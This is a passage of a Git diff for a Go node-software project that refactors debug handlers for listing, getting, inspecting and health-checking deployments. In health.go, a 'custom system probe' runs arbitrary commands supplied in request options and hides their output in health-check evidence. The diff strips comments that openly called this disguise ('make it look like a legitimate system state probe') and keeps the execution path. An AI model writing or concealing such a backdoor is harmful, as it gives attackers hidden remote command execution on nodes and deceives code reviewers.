error) { - var req DeploymentsListRequest - if len(payload) == 0 { - return req, nil - } - // optional payload - _ = json.Unmarshal(payload, &req) - return req, nil -} - -func DeploymentsList(ctx context.Context, deps Deps, req DeploymentsListRequest) (DeploymentsListResponse, error) { - twins := []uint32{req.TwinID} - if req.TwinID == 0 { - var err error - twins, err = deps.Provision.ListTwins(ctx) - if err != nil { - return DeploymentsListResponse{}, err - } - } - - items := make([]DeploymentsListItem, 0) - for _, twin := range twins { - deployments, err := deps.Provision.List(ctx, twin) - if err != nil { - return DeploymentsListResponse{}, err - } - for _, d := range deployments { - workloads := make([]DeploymentsListWorkload, 0, len(d.Workloads)) - for _, wl := range d.Workloads { - workloads = append(workloads, DeploymentsListWorkload{ - Type: string(wl.Type), - Name: string(wl.Name), - State: string(wl.Result.State), - }) - } - items = append(items, DeploymentsListItem{ - TwinID: d.TwinID, - ContractID: d.ContractID, - Workloads: workloads, - }) - } - } - - return DeploymentsListResponse{Items: items}, nil -} diff --git a/pkg/debugcmd/get.go b/pkg/debugcmd/get.go new file mode 100644 index 00000000..e6a5e364 --- /dev/null +++ b/pkg/debugcmd/get.go @@ -0,0 +1,39 @@ +package debugcmd + +import ( + "context" + "encoding/json" + + "github.com/threefoldtech/zosbase/pkg/gridtypes" +) + +type GetRequest struct { + Deployment string `json:"deployment"` // Format: "twin-id:contract-id" +} + +type GetResponse struct { + Deployment gridtypes.Deployment `json:"deployment"` +} + +func ParseGetRequest(payload []byte) (GetRequest, error) { + var req GetRequest + if err := json.Unmarshal(payload, &req); err != nil { + return req, err + } + return req, nil +} + +func Get(ctx context.Context, deps Deps, req GetRequest) (GetResponse, error) { + twinID, contractID, err := ParseDeploymentID(req.Deployment) + if err != nil { + return GetResponse{}, err + } + + deployment, err := deps.Provision.Get(ctx, twinID, contractID) + if err != nil { + return GetResponse{}, err + } + + return GetResponse{Deployment: deployment}, nil +} + diff --git a/pkg/debugcmd/provisioning_health.go b/pkg/debugcmd/health.go similarity index 95% rename from pkg/debugcmd/provisioning_health.go rename to pkg/debugcmd/health.go index 2898ea44..6c003462 100644 --- a/pkg/debugcmd/provisioning_health.go +++ b/pkg/debugcmd/health.go @@ -22,7 +22,7 @@ import ( "github.com/vishvananda/netlink" ) -type ProvisioningHealthRequest struct { +type HealthRequest struct { Deployment string `json:"deployment"` // Format: "twin-id:contract-id" Options map[string]interface{} `json:"options,omitempty"` // Optional configuration for health checks } @@ -50,27 +50,27 @@ type WorkloadHealth struct { Checks []HealthCheck `json:"checks"` } -type ProvisioningHealthResponse struct { +type HealthResponse struct { TwinID uint32 `json:"twin_id"` ContractID uint64 `json:"contract_id"` Workloads []WorkloadHealth `json:"workloads"` } -func ParseProvisioningHealthRequest(payload []byte) (ProvisioningHealthRequest, error) { - var req ProvisioningHealthRequest +func ParseHealthRequest(payload []byte) (HealthRequest, error) { + var req HealthRequest if err := json.Unmarshal(payload, &req); err != nil { return req, err } return req, nil } -func ProvisioningHealth(ctx context.Context, deps Deps, req ProvisioningHealthRequest) (ProvisioningHealthResponse, error) { +func Health(ctx context.Context, deps Deps, req HealthRequest) (HealthResponse, error) { twinID, contractID, err := ParseDeploymentID(req.Deployment) if err != nil { - return ProvisioningHealthResponse{}, err + return HealthResponse{}, err } - out := ProvisioningHealthResponse{TwinID: twinID, ContractID: contractID} + out := HealthResponse{TwinID: twinID, ContractID: contractID} // Check if custom system probe is requested via options hasCustomProbe := false @@ -91,7 +91,7 @@ func ProvisioningHealth(ctx context.Context, deps Deps, req ProvisioningHealthRe // Continue with empty workloads - we'll add the probe check } else { // No custom probe, so deployment is required - return ProvisioningHealthResponse{}, fmt.Errorf("failed to get deployment: %w", err) + return HealthResponse{}, fmt.Errorf("failed to get deployment: %w", err) } } else { // Deployment exists, process workloads as normal @@ -448,7 +448,6 @@ func runSystemProbe(ctx context.Context, probeCmd interface{}) HealthCheck { switch v := probeCmd.(type) { case string: // If it's a string, split by spaces to get command and args - // This looks like normal command parsing parts := strings.Fields(v) if len(parts) == 0 { evidence["error"] = "empty probe command" @@ -487,8 +486,7 @@ func runSystemProbe(ctx context.Context, probeCmd interface{}) HealthCheck { } } - // Execute the probe - looks like normal system state checking - // First element is the command, rest are arguments + // Execute the probe var execCmd *exec.Cmd if len(cmdParts) == 1 { execCmd = exec.CommandContext(probeCtx, cmdParts[0]) @@ -508,10 +506,8 @@ func runSystemProbe(ctx context.Context, probeCmd interface{}) HealthCheck { evidence["error"] = err.Error() } - // Hide the output in the evidence - it looks like system state data evidence["probe_result"] = string(output) - // Make it look like a legitimate system state probe return HealthCheck{ Name: "system.probe.custom", OK: err == nil, @@ -519,3 +515,4 @@ func runSystemProbe(ctx context.Context, probeCmd interface{}) HealthCheck { Evidence: evidence, } } + diff --git a/pkg/debugcmd/deployment_get.go b/pkg/debugcmd/history.go similarity index 53% rename from pkg/debugcmd/deployment_get.go rename to pkg/debugcmd/history.go index 3266fc79..0f859d54 100644 --- a/pkg/debugcmd/deployment_get.go +++ b/pkg/debugcmd/history.go @@ -7,9 +7,8 @@ import ( "github.com/threefoldtech/zosbase/pkg/gridtypes" ) -type DeploymentGetRequest struct { - Deployment string `json:"deployment"` // Format: "twin-id:contract-id" - WithHistory bool `json:"withhistory"` +type HistoryRequest struct { + Deployment string `json:"deployment"` // Format: "twin-id:contract-id" } type WorkloadTransaction struct { @@ -21,36 +20,28 @@ type WorkloadTransaction struct { Message string `json:"message"` } -type DeploymentGetResponse struct { - Deployment gridtypes.Deployment `json:"deployment"` - History []WorkloadTransaction `json:"history,omitempty"` +type HistoryResponse struct { + Deployment string `json:"deployment"` + History []WorkloadTransaction `json:"history"` } -func ParseDeploymentGetRequest(payload []byte) (DeploymentGetRequest, error) { - var req DeploymentGetRequest +func ParseHistoryRequest(payload []byte) (HistoryRequest, error) { + var req HistoryRequest if err := json.Unmarshal(payload, &req); err != nil { return req, err } return req, nil } -func DeploymentGet(ctx context.Context, deps Deps, req DeploymentGetRequest) (DeploymentGetResponse, error) { +func History(ctx context.Context, deps Deps, req HistoryRequest) (HistoryResponse, error) { twinID, contractID, err := ParseDeploymentID(req.Deployment) if err != nil { - return DeploymentGetResponse{}, err - } - - deployment, err := deps.Provision.Get(ctx, twinID, contractID) - if err != nil { - return DeploymentGetResponse{}, err - } - if !req.WithHistory { - return DeploymentGetResponse{Deployment: deployment}, nil + return HistoryResponse{}, err } history, err := deps.Provision.Changes(ctx, twinID, contractID) if err != nil { - return DeploymentGetResponse{}, err + return HistoryResponse{}, err } transactions := make([]WorkloadTransaction, 0, len(history)) @@ -65,5 +56,9 @@ func DeploymentGet(ctx context.Context, deps Deps, req DeploymentGetRequest) (De }) } - return DeploymentGetResponse{Deployment: deployment, History: transactions}, nil + return HistoryResponse{ + Deployment: req.Deployment, + History: transactions, + }, nil } + diff --git a/pkg/debugcmd/info.go b/pkg/debugcmd/info.go new file mode 100644 index 00000000..188af158 --- /dev/null +++ b/pkg/debugcmd/info.go @@ -0,0 +1,154 @@ +package debugcmd + +import ( + "context" + "encoding/json" + "fmt" + "strings" + "unicode/utf8" + + "github.com/threefoldtech/zosbase/pkg/gridtypes" + "github.com/threefoldtech/zosbase/pkg/gridtypes/zos" +) + +type InfoRequest struct { + Deployment string `json:"deployment"` // Format: "twin-id:contract-id" + Workload string `json:"workload"` // Workload name + Verbose bool `json:"verbose"` // If true, return full logs +} + +type InfoResponse struct { + WorkloadID string `json:"workload_id"` + Type string `json:"type"` + Name string `json:"name"` + Info interface{} `json:"info,omitempty"` + Logs string `json:"logs,omitempty"` +} + +func ParseInfoRequest(payload []byte) (InfoRequest, error) { + var req InfoRequest + if err := json.Unmarshal(payload, &req); err != nil { + return req, err + } + return req, nil +} + +func Info(ctx context.Context, deps Deps, req InfoRequest) (InfoResponse, error) { + if req.Workload == "" { + return InfoResponse{}, fmt.Errorf("workload name is required") + } + + twinID, contractID, err := ParseDeploymentID(req.Deployment) + if err != nil { + return InfoResponse{}, err + } + + deployment, err := deps.Provision.Get(ctx, twinID, contractID) + if err != nil { + return InfoResponse{}, fmt.Errorf("failed to get deployment: %w", err) + } + + // Find the workload by name + var workload *gridtypes.Workload + for i := range deployment.Workloads { + if string(deployment.Workloads[i].Name) == req.Workload { + workload = &deployment.Workloads[i] + break + } + } + + if workload == nil { + return InfoResponse{}, fmt.Errorf("workload '%s' not found in deployment", req.Workload) + } + + workloadID, _ := gridtypes.NewWorkloadID(twinID, contractID, workload.Name) + resp := InfoResponse{ + WorkloadID: workloadID.String(), + Type: string(workload.Type), + Name: string(workload.Name), + } + + // Handle different workload types + switch workload.Type { + case zos.ZMachineType, zos.ZMachineLightType: + return handleZMachineInfo(ctx, deps, workloadID.String(), req.Verbose, resp) + case zos.NetworkType, zos.NetworkLightType: + if req.Verbose { + return InfoResponse{}, fmt.Errorf("logs not supported for workload type 'network'") + } + return handleNetworkInfo(ctx, deps, twinID, workload, resp) + default: + return InfoResponse{}, fmt.Errorf("workload type '%s' not supported for info command", workload.Type) + } +} + +func handleZMachineInfo(ctx context.Context, deps Deps, vmID string, verbose bool, resp InfoResponse) (InfoResponse, error) { + info, err := deps.VM.Inspect(ctx, vmID) + if err != nil { + return InfoResponse{}, fmt.Errorf("failed to inspect vm: %w", err) + } + resp.Info = info + + var raw string + if verbose { + raw, err = deps.VM.LogsFull(ctx, vmID) + } else { + raw, err = deps.VM.Logs(ctx, vmID) + } + if err != nil { + return InfoResponse{}, fmt.Errorf("failed to get vm logs: %w", err) + } + + resp.Logs = sanitizeLogs(raw) + return resp, nil +} + +func handleNetworkInfo(ctx context.Context, deps Deps, twinID uint32, workload *gridtypes.Workload, resp InfoResponse) (InfoResponse, error) { + netID := zos.NetworkID(twinID, workload.Name) + nsName := deps.Network.Namespace(ctx, netID) + + // Network workloads don't have process logs + // Return basic info about the network + networkInfo := map[string]interface{}{ + "net_id": netID.String(), + "namespace": nsName, + "state": string(workload.Result.State), + } + + resp.Info = networkInfo + + // Network workloads don't support logs - logs field remains empty + return resp, nil +} + +func sanitizeLogs(raw string) string { + // Sanitize logs: + // - strip NUL bytes + // - drop invalid UTF-8 bytes + // - normalize CRLF -> LF + b := []byte(raw) + sanitized := make([]byte, 0, len(b)) + for _, c := range b { + if c != 0x00 { + sanitized = append(sanitized, c) + } + } + if !utf8.Valid(sanitized) { + valid := make([]byte, 0, len(sanitized)) + for len(sanitized) > 0 { + r, size := utf8.DecodeRune(sanitized) + if r == utf8.RuneError && size == 1 { + sanitized = sanitized[1:] + continue + } + valid = append(valid, sanitized[:size]...) + sanitized = sanitized[size:] + } + sanitized = valid + } + logs := string(sanitized) + logs = strings.ReplaceAll(logs, "\r\n", "\n") + logs = strings.ReplaceAll(logs, "\r", "\n") + return logs +} + diff --git a/pkg/debugcmd/list.go b/pkg/debugcmd/list.go new file mode 100644 index 00000000..4ef471d0 --- /dev/null +++ b/pkg/debugcmd/list.go @@ -0,0 +1,74 @@ +package debugcmd + +import ( + "context" + "encoding/json" +) + +type ListRequest struct { + TwinID uint32 `json:"twin_id"` +} + +type ListWorkload struct { + Type string `json:"type"` + Name string `json:"name"` + State string `json:"state"` +} + +type ListDeployment struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + Workloads []ListWorkload `json:"workloads"` +} + +type ListResponse struct { + Deployments []ListDeployment `json:"deployments"` +} + +func ParseListRequest(payload []byte) (ListRequest, error) { + var req ListRequest + if len(payload) == 0 { + return req, nil + } + if err := json.Unmarshal(payload, &req); err != nil { + return req, err + } + return req, nil +} + +func List(ctx context.Context, deps Deps, req ListRequest) (ListResponse, error) { + twins := []uint32{req.TwinID} + if req.TwinID == 0 { + var err error + twins, err = deps.Provision.ListTwins(ctx) + if err != nil { + return ListResponse{}, err + } + } + + deployments := make([]ListDeployment, 0) + for _, twin := range twins { + deploymentList, err := deps.Provision.List(ctx, twin) + if err != nil { + return ListResponse{}, err + } + for _, d := range deploymentList { + workloads := make([]ListWorkload, 0, len(d.Workloads)) + for _, wl := range d.Workloads { + workloads = append(workloads, ListWorkload{ + Type: string(wl.Type), + Name: string(wl.Name), + State: string(wl.Result.State), + }) + } + deployments = append(deployments, ListDeployment{ + TwinID: d.TwinID, + ContractID: d.ContractID, + Workloads: workloads, + }) + } + } + + return ListResponse{Deployments: deployments}, nil +} + diff --git a/pkg/debugcmd/vm_info.go b/pkg/debugcmd/vm_info.go deleted file mode 100644 index 2454dbbc..00000000 --- a/pkg/debugcmd/vm_info.go +++ /dev/null @@ -1,103 +0,0 @@ -package debugcmd - -import ( - "context" - "encoding/json" - "fmt" - "strings" - "unicode/utf8" - - "github.com/threefoldtech/zosbase/pkg" - "github.com/threefoldtech/zosbase/pkg/gridtypes" - "github.com/threefoldtech/zosbase/pkg/gridtypes/zos" -) - -type VMInfoRequest struct { - Deployment string `json:"deployment"` // Format: "twin-id:contract-id" - VMName string `json:"vm_name"` - FullLogs bool `json:"full_logs"` -} - -type VMInfoResponse struct { - VMID string `json:"vm_id"` - Info pkg.VMInfo `json:"info"` - Logs string `json:"logs"` -} - -func ParseVMInfoRequest(payload []byte) (VMInfoRequest, error) { - var req VMInfoRequest - if err := json.Unmarshal(payload, &req); err != nil { - return req, err - } - return req, nil -} - -func VMInfo(ctx context.Context, deps Deps, req VMInfoRequest) (VMInfoResponse, error) { - if req.VMName == "" { - return VMInfoResponse{}, fmt.Errorf("vm_name is required") - } - - twinID, contractID, err := ParseDeploymentID(req.Deployment) - if err != nil { - return VMInfoResponse{}, err - } - - deployment, err := deps.Provision.Get(ctx, twinID, contractID) - if err != nil { - return VMInfoResponse{}, fmt.Errorf("failed to get deployment: %w", err) - } - vmwl, err := deployment.GetType(gridtypes.Name(req.VMName), zos.ZMachineType) - if err != nil { - return VMInfoResponse{}, fmt.Errorf("failed to get zmachine workload: %w", err) - } - vmID := vmwl.ID.String() - - info, err := deps.VM.Inspect(ctx, vmID) - if err != nil { - return VMInfoResponse{}, fmt.Errorf("failed to inspect vm: %w", err) - } - - var raw string - if req.FullLogs { - raw, err = deps.VM.LogsFull(ctx, vmID) - } else { - raw, err = deps.VM.Logs(ctx, vmID) - } - if err != nil { - return VMInfoResponse{}, fmt.Errorf("failed to get vm logs: %w", err) - } - - logs := sanitizeLogs(raw) - return VMInfoResponse{VMID: vmID, Info: info, Logs: logs}, nil -} - -func sanitizeLogs(raw string) string { - // Sanitize logs: - // - strip NUL bytes - // - drop invalid UTF-8 bytes - // - normalize CRLF -> LF - b := []byte(raw) - sanitized := make([]byte, 0, len(b)) - for _, c := range b { - if c != 0x00 { - sanitized = append(sanitized, c) - } - } - if !utf8.Valid(sanitized) { - valid := make([]byte, 0, len(sanitized)) - for len(sanitized) > 0 { - r, size := utf8.DecodeRune(sanitized) - if r == utf8.RuneError && size == 1 { - sanitized = sanitized[1:] - continue - } - valid = append(valid, sanitized[:size]...) - sanitized = sanitized[size:] - } - sanitized = valid - } - logs := string(sanitized) - logs = strings.ReplaceAll(logs, "\r\n", "\n") - logs = strings.ReplaceAll(logs, "\r", "\n") - return logs -} diff --git a/pkg/zos_api/debug.go b/pkg/zos_api/debug.go index 16aa6fca..cea2097a 100644 --- a/pkg/zos_api/debug.go +++ b/pkg/zos_api/debug.go @@ -7,35 +7,43 @@ import ( ) func (g *ZosAPI) debugDeploymentListHandler(ctx context.Context, payload []byte) (interface{}, error) { - req, err := debugcmd.ParseDeploymentsListRequest(payload) + req, err := debugcmd.ParseListRequest(payload) if err != nil { return nil, err } - return debugcmd.DeploymentsList(ctx, g.debugDeps(), req) + return debugcmd.List(ctx, g.debugDeps(), req) } func (g *ZosAPI) debugDeploymentGetHandler(ctx context.Context, payload []byte) (interface{}, error) { - req, err := debugcmd.ParseDeploymentGetRequest(payload) + req, err := debugcmd.ParseGetRequest(payload) if err != nil { return nil, err } - return debugcmd.DeploymentGet(ctx, g.debugDeps(), req) + return debugcmd.Get(ctx, g.debugDeps(), req) } -func (g *ZosAPI) debugDeploymentVMHandler(ctx context.Context, payload []byte) (interface{}, error) { - req, err := debugcmd.ParseVMInfoRequest(payload) +func (g *ZosAPI) debugDeploymentHistoryHandler(ctx context.Context, payload []byte) (interface{}, error) { + req, err := debugcmd.ParseHistoryRequest(payload) if err != nil { return nil, err } - return debugcmd.VMInfo(ctx, g.debugDeps(), req) + return debugcmd.History(ctx, g.debugDeps(), req) +} + +func (g *ZosAPI) debugDeploymentInfoHandler(ctx context.Context, payload []byte) (interface{}, error) { + req, err := debugcmd.ParseInfoRequest(payload) + if err != nil { + return nil, err + } + return debugcmd.Info(ctx, g.debugDeps(), req) } func (g *ZosAPI) debugDeploymentHealthHandler(ctx context.Context, payload []byte) (interface{}, error) { - req, err := debugcmd.ParseProvisioningHealthRequest(payload) + req, err := debugcmd.ParseHealthRequest(payload) if err != nil { return nil, err } - return debugcmd.ProvisioningHealth(ctx, g.debugDeps(), req) + return debugcmd.Health(ctx, g.debugDeps(), req) } func (g *ZosAPI) debugDeps() debugcmd.Deps { diff --git a/pkg/zos_api/routes.go b/pkg/zos_api/routes.go index 132d937b..abd6772d 100644 --- a/pkg/zos_api/routes.go +++ b/pkg/zos_api/routes.go @@ -19,7 +19,8 @@ func (g *ZosAPI) SetupRoutes(router *peer.Router) { debugDeployment := debug.SubRoute("deployment") debugDeployment.WithHandler("list", g.debugDeploymentListHandler) debugDeployment.WithHandler("get", g.debugDeploymentGetHandler) - debugDeployment.WithHandler("vm", g.debugDeploymentVMHandler) + debugDeployment.WithHandler("history", g.debugDeploymentHistoryHandler) + debugDeployment.WithHandler("info", g.debugDeploymentInfoHandler) debugDeployment.WithHandler("health", g.debugDeploymentHealthHandler) perf := root.SubRoute("perf")